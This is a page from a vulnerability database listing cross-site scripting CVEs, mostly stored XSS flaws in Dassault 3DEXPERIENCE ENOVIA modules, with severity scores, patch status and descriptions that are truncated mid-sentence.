EPSS 1% CVSS 5.4
MEDIUM This Month

Agate is central authentication server software for OBiBa epidemiology applications. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS
NVD GitHub
CVE-2025-0833
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting Route Management in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2024x allows an. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
CVE-2025-0832
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting Project Gantt in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
CVE-2025-0830
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting Meeting Management in ENOVIA Change Manager from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
CVE-2025-0829
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting 3D Markup in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
CVE-2025-0828
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting Engineering Release in ENOVIA Product Engineering Specialist from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
CVE-2025-0827
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting 3DPlay in 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS
NVD
CVE-2025-0826
EPSS 0% CVSS 8.7
HIGH This Week

A stored Cross-site Scripting (XSS) vulnerability affecting 3D Navigate in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS 3dexperience Enovia
NVD
Prev Page 87 of 114 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
10174

Related CWEs

MITRE ATT&CK

References

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy